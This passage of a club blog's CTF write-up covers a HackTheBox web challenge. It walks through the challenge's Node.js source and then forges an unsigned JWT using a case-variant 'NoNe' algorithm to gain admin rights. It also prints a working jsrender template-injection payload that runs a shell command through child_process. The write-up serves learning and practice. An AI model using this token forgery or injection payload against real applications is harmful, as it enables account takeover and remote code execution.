</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>create</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                <span class=nx>username</span><span class=o>:</span> <span class=nx>username</span><span class=p>,</span>
</span></span><span class=line><span class=cl>                <span class=nx>password</span><span class=o>:</span> <span class=nx>bcrypt</span><span class=p>.</span><span class=nx>hashSync</span><span class=p>(</span><span class=nx>password</span><span class=p>),</span>
</span></span><span class=line><span class=cl>            <span class=p>}).</span><span class=nx>then</span><span class=p>(()</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=nx>res</span><span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;User registered succesfully&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>error</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=nx>console</span><span class=p>.</span><span class=nx>error</span><span class=p>(</span><span class=nx>error</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>500</span><span class=p>).</span><span class=nx>send</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                <span class=nx>error</span><span class=o>:</span> <span class=s2>&#34;Something went wrong!&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=p>........</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=nx>router</span><span class=p>.</span><span class=nx>post</span><span class=p>(</span><span class=s2>&#34;/login&#34;</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>username</span> <span class=o>=</span> <span class=nx>req</span><span class=p>.</span><span class=nx>body</span><span class=p>.</span><span class=nx>username</span><span class=p>;</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>password</span> <span class=o>=</span> <span class=nx>req</span><span class=p>.</span><span class=nx>body</span><span class=p>.</span><span class=nx>password</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>username</span> <span class=o>||</span> <span class=o>!</span><span class=nx>password</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>400</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Username and password are required&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>user</span> <span class=o>=</span> <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findOne</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                <span class=nx>where</span><span class=o>:</span> <span class=p>{</span> <span class=nx>username</span><span class=o>:</span> <span class=nx>username</span> <span class=p>},</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>user</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>400</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Invalid username or password&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>validPassword</span> <span class=o>=</span> <span class=nx>bcrypt</span><span class=p>.</span><span class=nx>compareSync</span><span class=p>(</span><span class=nx>password</span><span class=p>,</span> <span class=nx>user</span><span class=p>.</span><span class=nx>password</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>validPassword</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>400</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Invalid username or password&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>token</span> <span class=o>=</span> <span class=nx>jwt</span><span class=p>.</span><span class=nx>sign</span><span class=p>({</span> <span class=nx>id</span><span class=o>:</span> <span class=nx>user</span><span class=p>.</span><span class=nx>id</span> <span class=p>},</span> <span class=nx>tokenKey</span><span class=p>,</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=nx>expiresIn</span><span class=o>:</span> <span class=s2>&#34;1h&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>cookie</span><span class=p>(</span><span class=s2>&#34;session&#34;</span><span class=p>,</span> <span class=nx>token</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>200</span><span class=p>).</span><span class=nx>send</span><span class=p>(</span><span class=nx>response</span><span class=p>(</span><span class=s2>&#34;Logged in successfully&#34;</span><span class=p>));</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>error</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=nx>console</span><span class=p>.</span><span class=nx>error</span><span class=p>(</span><span class=nx>error</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>500</span><span class=p>).</span><span class=nx>send</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                <span class=nx>error</span><span class=o>:</span> <span class=s2>&#34;Something went wrong!&#34;</span><span class=p>,</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=p>........</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=nx>router</span><span class=p>.</span><span class=nx>get</span><span class=p>(</span><span class=s2>&#34;/admin&#34;</span><span class=p>,</span> <span class=nx>AdminMiddleware</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>users</span> <span class=o>=</span> <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findAll</span><span class=p>();</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>usernames</span> <span class=o>=</span> <span class=nx>users</span><span class=p>.</span><span class=nx>map</span><span class=p>((</span><span class=nx>user</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=nx>user</span><span class=p>.</span><span class=nx>username</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>render</span><span class=p>(</span><span class=s2>&#34;admin&#34;</span><span class=p>,</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=nx>users</span><span class=o>:</span> <span class=nx>jsrender</span><span class=p>.</span><span class=nx>templates</span><span class=p>(</span><span class=sb>`</span><span class=si>${</span><span class=nx>usernames</span><span class=si>}</span><span class=sb>`</span><span class=p>).</span><span class=nx>render</span><span class=p>(),</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>error</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=nx>console</span><span class=p>.</span><span class=nx>error</span><span class=p>(</span><span class=nx>error</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>500</span><span class=p>).</span><span class=nx>send</span><span class=p>(</span><span class=s2>&#34;Something went wrong!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=nx>router</span><span class=p>.</span><span class=nx>get</span><span class=p>(</span><span class=s2>&#34;/logout&#34;</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=nx>res</span><span class=p>.</span><span class=nx>clearCookie</span><span class=p>(</span><span class=s2>&#34;session&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>redirect</span><span class=p>(</span><span class=s2>&#34;/&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=nx>router</span><span class=p>;</span>
</span></span><span class=line><span class=cl><span class=p>};</span>
</span></span></code></pre></div><p>Okay, so it has some basic authentication funtions like <code>register</code>, <code>login</code> and <code>logout</code>; in addition to that we also has 2 authorization middlewares <code>AdminMiddleware</code> and <code>AuthMiddleware</code>. And they all use <a href=https://jwt.io/ target=_blank rel=noopener><code>Json Web Token (JWT)</code></a>.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-js data-lang=js><span class=line><span class=cl><span class=nx>router</span><span class=p>.</span><span class=nx>get</span><span class=p>(</span><span class=s2>&#34;/admin&#34;</span><span class=p>,</span> <span class=nx>AdminMiddleware</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=kr>const</span> <span class=nx>users</span> <span class=o>=</span> <span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findAll</span><span class=p>();</span>
</span></span><span class=line><span class=cl>        <span class=kr>const</span> <span class=nx>usernames</span> <span class=o>=</span> <span class=nx>users</span><span class=p>.</span><span class=nx>map</span><span class=p>((</span><span class=nx>user</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=nx>user</span><span class=p>.</span><span class=nx>username</span><span class=p>);</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=c1>// This pepega jsrender things
</span></span></span><span class=line><span class=cl><span class=c1></span>        <span class=nx>res</span><span class=p>.</span><span class=nx>render</span><span class=p>(</span><span class=s2>&#34;admin&#34;</span><span class=p>,</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=nx>users</span><span class=o>:</span> <span class=nx>jsrender</span><span class=p>.</span><span class=nx>templates</span><span class=p>(</span><span class=sb>`</span><span class=si>${</span><span class=nx>usernames</span><span class=si>}</span><span class=sb>`</span><span class=p>).</span><span class=nx>render</span><span class=p>(),</span>
</span></span><span class=line><span class=cl>        <span class=p>});</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>error</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=nx>console</span><span class=p>.</span><span class=nx>error</span><span class=p>(</span><span class=nx>error</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>500</span><span class=p>).</span><span class=nx>send</span><span class=p>(</span><span class=s2>&#34;Something went wrong!&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nx>router</span><span class=p>.</span><span class=nx>get</span><span class=p>(</span><span class=s2>&#34;/logout&#34;</span><span class=p>,</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nx>res</span><span class=p>.</span><span class=nx>clearCookie</span><span class=p>(</span><span class=s2>&#34;session&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>redirect</span><span class=p>(</span><span class=s2>&#34;/&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl><span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>return</span> <span class=nx>router</span><span class=p>;</span>
</span></span></code></pre></div><p>What really stands out of them all is at the <code>/admin</code> endpoint which allows us to inject something in the template. But first, we need to bypass the <code>AuthMiddleware</code>. Looking what it does, we find something really interesting.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-js data-lang=js><span class=line><span class=cl><span class=kr>const</span> <span class=nx>AdminMiddleware</span> <span class=o>=</span> <span class=kr>async</span> <span class=p>(</span><span class=nx>req</span><span class=p>,</span> <span class=nx>res</span><span class=p>,</span> <span class=nx>next</span><span class=p>)</span> <span class=p>=&gt;</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=k>try</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=kr>const</span> <span class=nx>sessionCookie</span> <span class=o>=</span> <span class=nx>req</span><span class=p>.</span><span class=nx>cookies</span><span class=p>.</span><span class=nx>session</span><span class=p>;</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=p>(</span><span class=o>!</span><span class=nx>sessionCookie</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>redirect</span><span class=p>(</span><span class=s2>&#34;/login&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>        <span class=kr>const</span> <span class=nx>decoded</span> <span class=o>=</span> <span class=nx>jwt</span><span class=p>.</span><span class=nx>decode</span><span class=p>(</span><span class=nx>sessionCookie</span><span class=p>,</span> <span class=p>{</span> <span class=nx>complete</span><span class=o>:</span> <span class=kc>true</span> <span class=p>});</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=p>(</span><span class=nx>decoded</span><span class=p>.</span><span class=nx>header</span><span class=p>.</span><span class=nx>alg</span> <span class=o>==</span> <span class=s1>&#39;none&#39;</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>redirect</span><span class=p>(</span><span class=s2>&#34;/login&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>else</span> <span class=k>if</span> <span class=p>(</span><span class=nx>decoded</span><span class=p>.</span><span class=nx>header</span><span class=p>.</span><span class=nx>alg</span> <span class=o>==</span> <span class=s2>&#34;HS256&#34;</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>user</span> <span class=o>=</span> <span class=nx>jwt</span><span class=p>.</span><span class=nx>verify</span><span class=p>(</span><span class=nx>sessionCookie</span><span class=p>,</span> <span class=nx>tokenKey</span><span class=p>,</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=nx>algorithms</span><span class=o>:</span> <span class=p>[</span><span class=nx>decoded</span><span class=p>.</span><span class=nx>header</span><span class=p>.</span><span class=nx>alg</span><span class=p>],</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span>
</span></span><span class=line><span class=cl>                <span class=o>!</span><span class=p>(</span><span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findOne</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                    <span class=nx>where</span><span class=o>:</span> <span class=p>{</span> <span class=nx>id</span><span class=o>:</span> <span class=nx>user</span><span class=p>.</span><span class=nx>id</span><span class=p>,</span> <span class=nx>username</span><span class=o>:</span> <span class=s2>&#34;admin&#34;</span> <span class=p>},</span>
</span></span><span class=line><span class=cl>                <span class=p>}))</span>
</span></span><span class=line><span class=cl>            <span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>403</span><span class=p>).</span><span class=nx>send</span><span class=p>(</span><span class=s2>&#34;You are not an admin&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>            <span class=kr>const</span> <span class=nx>user</span> <span class=o>=</span> <span class=nx>jwt</span><span class=p>.</span><span class=nx>verify</span><span class=p>(</span><span class=nx>sessionCookie</span><span class=p>,</span> <span class=kc>null</span><span class=p>,</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=nx>algorithms</span><span class=o>:</span> <span class=p>[</span><span class=nx>decoded</span><span class=p>.</span><span class=nx>header</span><span class=p>.</span><span class=nx>alg</span><span class=p>],</span>
</span></span><span class=line><span class=cl>            <span class=p>});</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=p>(</span>
</span></span><span class=line><span class=cl>                <span class=o>!</span><span class=p>(</span><span class=kr>await</span> <span class=nx>db</span><span class=p>.</span><span class=nx>Users</span><span class=p>.</span><span class=nx>findOne</span><span class=p>({</span>
</span></span><span class=line><span class=cl>                    <span class=nx>where</span><span class=o>:</span> <span class=p>{</span> <span class=nx>id</span><span class=o>:</span> <span class=nx>user</span><span class=p>.</span><span class=nx>id</span><span class=p>,</span> <span class=nx>username</span><span class=o>:</span> <span class=s2>&#34;admin&#34;</span> <span class=p>},</span>
</span></span><span class=line><span class=cl>                <span class=p>}))</span>
</span></span><span class=line><span class=cl>            <span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=k>return</span> <span class=nx>res</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>status</span><span class=p>(</span><span class=mi>403</span><span class=p>)</span>
</span></span><span class=line><span class=cl>                    <span class=p>.</span><span class=nx>send</span><span class=p>({</span> <span class=nx>message</span><span class=o>:</span> <span class=s2>&#34;You are not an admin&#34;</span> <span class=p>});</span>
</span></span><span class=line><span class=cl>            <span class=p>}</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span> <span class=k>catch</span> <span class=p>(</span><span class=nx>err</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=nx>res</span><span class=p>.</span><span class=nx>redirect</span><span class=p>(</span><span class=s2>&#34;/login&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=nx>next</span><span class=p>();</span>
</span></span><span class=line><span class=cl><span class=p>};</span>
</span></span></code></pre></div><p>Do you see something fun here ? It checks for the header algorith field. If it is <code>none</code>, it makes us login again. And if it is <code>HS256</code>, which basically the same algorithm it uses to authenticate, the app verifies using the random generated key. Or &ldquo;else&rdquo; it verifies with no key at all. This is fun because only with algorithm <code>none</code>, the function <code>verify</code> would work.</p><p>I was banging my head for a while, I realised that it doesn&rsquo;t check for <code>NoNe</code>, <code>NonE</code> but it is still able to decoded and verified. That lead us to craft a JWT to pass to the <code>session</code> cookie for admin previlege. I crafted the JWT manually 😵‍💫.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-fallback data-lang=fallback><span class=line><span class=cl>eyJhbGciOiJOb05lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwiaWF0IjoxNjc5NTk0OTY1LCJleHAiOjI2Nzk1OTg1NjV9.
</span></span><span class=line><span class=cl>{
</span></span><span class=line><span class=cl>  &#34;alg&#34;: &#34;None&#34;,
</span></span><span class=line><span class=cl>  &#34;typ&#34;: &#34;JWT&#34;
</span></span><span class=line><span class=cl>}
</span></span><span class=line><span class=cl>{
</span></span><span class=line><span class=cl>  &#34;id&#34;: 1,
</span></span><span class=line><span class=cl>  &#34;iat&#34;: 1679594965,
</span></span><span class=line><span class=cl>  &#34;exp&#34;: 2679598565
</span></span><span class=line><span class=cl>}
</span></span></code></pre></div><p>I modified the algorithm to <code>None</code>, &ldquo;id&rdquo; to <code>1</code> as 1 is the id of &ldquo;admin&rdquo; and set the expiration time to oblivion so I can take my time to get the flag.</p><img src=dict1.png alt="Admin panel demo"><p>For the flag, look again at the routes&rsquo; functions, we can get the flag through <a href=https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jsrender-nodejs target=_blank rel=noopener>SSTI on jsrender</a>. To do so the payload must be one of the usernames registered. Only thing we have to do now is to register a new account with the payload for the username.</p><p><code>{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}</code></p><img src=dict2.png alt=Payload>
<img src=dict3.png alt="Admin panel demo"><p>Flag: <code>HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}</code></p><h2 id=spybug-medium-coming-soon>SpyBug (medium) (coming soon)</h2><h2 id=traptrack-hard-coming-soon>TrapTrack (hard) (coming soon)</h2></div><div class=article-tags><a class="badge badge-light" href=/tag/ctf/>ctf</a>
<a class="badge badge-light" href=/tag/writeup/>writeup</a>
<a class="badge badge-light" href=/tag/web-exploitation/>web exploitation</a>
<a class="badge badge-light" href=/tag/web/>web</a>
<a class="badge badge-light" href=/tag/htb/>htb</a>
<a class="badge badge-light" href=/tag/hackthebox/>hackthebox</a>
<a class="badge badge-light" href=/tag/cyberapocalypse-2023/>cyberapocalypse-2023</a></div><div class=share-box><ul class=share><li><a href="https://twitter.com/intent/tweet?url=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/&amp;text=HackTheBox%20CyberApocalypse%202023%20-%20Web" target=_blank rel=noopener class=share-btn-twitter aria-label=twitter><i class="fab fa-twitter"></i></a></li><li><a href="https://www.facebook.com/sharer.php?u=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/&amp;t=HackTheBox%20CyberApocalypse%202023%20-%20Web" target=_blank rel=noopener class=share-btn-facebook aria-label=facebook><i class="fab fa-facebook"></i></a></li><li><a href="mailto:?subject=HackTheBox%20CyberApocalypse%202023%20-%20Web&amp;body=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/" target=_blank rel=noopener class=share-btn-email aria-label=envelope><i class="fas fa-envelope"></i></a></li><li><a href="https://www.linkedin.com/shareArticle?url=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/&amp;title=HackTheBox%20CyberApocalypse%202023%20-%20Web" target=_blank rel=noopener class=share-btn-linkedin aria-label=linkedin-in><i class="fab fa-linkedin-in"></i></a></li><li><a href="whatsapp://send?text=HackTheBox%20CyberApocalypse%202023%20-%20Web%20https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/" target=_blank rel=noopener class=share-btn-whatsapp aria-label=whatsapp><i class="fab fa-whatsapp"></i></a></li><li><a href="https://service.weibo.com/share/share.php?url=https://blog.bkisc.com/blog/hoangdayne/htb_cyberapocalypse2023_web/&amp;title=HackTheBox%20CyberApocalypse%202023%20-%20Web" target=_blank rel=noopener class=share-btn-weibo aria-label=weibo><i class="fab fa-weibo"></i></a></li></ul></div></div></article></div><div class=page-footer><div class=container><footer class=site-footer><p class="powered-by copyright-license-text">© 2023 BK Information Security Club</p><p class=powered-by>Published with <a href="https://wowchemy.com/?utm_campaign=poweredby" target=_blank rel=noopener>Wowchemy</a> — the free, <a href=https://github.com/wowchemy/wowchemy-hugo-themes target=_blank rel=noopener>open source</a> website builder that empowers creators.</p></footer></div></div><script src=/js/vendor-bundle.min.d26509351aa0ff874abbee824e982e9b.js></script>
<script src=https://cdn.jsdelivr.net/npm/leaflet@1.7.1/dist/leaflet.min.js integrity crossorigin=anonymous></script>
<script id=search-hit-fuse-template type=text/x-template>
    <div class="search-hit" id="summary-{{key}}">
      <div class="search-hit-content">
        <div class="search-hit-name">
          <a href="{{relpermalink}}">{{title}}</a>
          <div class="article-metadata search-hit-type">{{type}}</div>
          <p class="search-hit-description">{{snippet}}</p>
        </div>
      </div>
    </div>
  </script><script src=https://cdn.jsdelivr.net/gh/krisk/Fuse@v3.2.1/dist/fuse.min.js integrity="sha512-o38bmzBGX+hD3JHWUFCDA09btWaqrNmoJ3RXLlrysA7PP01Kgs4UlE4MhelE1v5dJR3+cxlR4qQlotsW7jKsnw==" crossorigin=anonymous></script>
<script src=https://cdn.jsdelivr.net/gh/julmot/mark.js@8.11.1/dist/jquery.mark.min.js integrity="sha512-mhbv5DqBMgrWL+32MmsDOt/OAvqr/cHimk6B8y/bx/xS88MVkYGPiVv2ixKVrkywF2qHplNRUvFsAHUdxZ3Krg==" crossorigin=anonymous></script>
<script id=page-data type=application/json>{"use_headroom":true}</script><script src=/js/wowchemy-headroom.c251366b4128fd5e6b046d4c97a62a51.js type=module></script>
<script src=/en/js/wowchemy.min.54dd6e4d8f2e4b1d098381b57f18dd83.js></script>
<script src=/js/wowchemy-map.a26e9d2f7238ba5b868384f1c5bc6477.js type=module></script></body></html>